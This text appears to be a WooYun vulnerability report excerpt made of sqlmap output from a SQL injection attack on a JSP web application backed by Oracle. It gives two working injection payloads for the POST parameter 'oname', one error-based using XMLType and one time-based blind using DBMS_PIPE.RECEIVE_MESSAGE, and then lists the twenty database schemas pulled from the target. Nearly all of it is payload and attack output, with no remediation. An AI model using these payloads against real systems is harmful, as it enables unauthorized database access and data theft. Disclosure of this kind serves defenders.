WooYun.org

Parameter: oname (POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: oname=1' AND 5540=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)|
|CHR(118)||CHR(122)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (5540=5540) THEN 1 EL
SE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(118)||CHR(120)||CHR(113)||CHR(62))
) FROM DUAL) AND 'gjwc' LIKE 'gjwc
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: oname=1' AND 9849=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(85)||CHR(
71)||CHR(89),5) AND 'iVyq' LIKE 'iVyq
---
[00:37:10] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle

available databases [20]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] FOUND
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] QCMS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB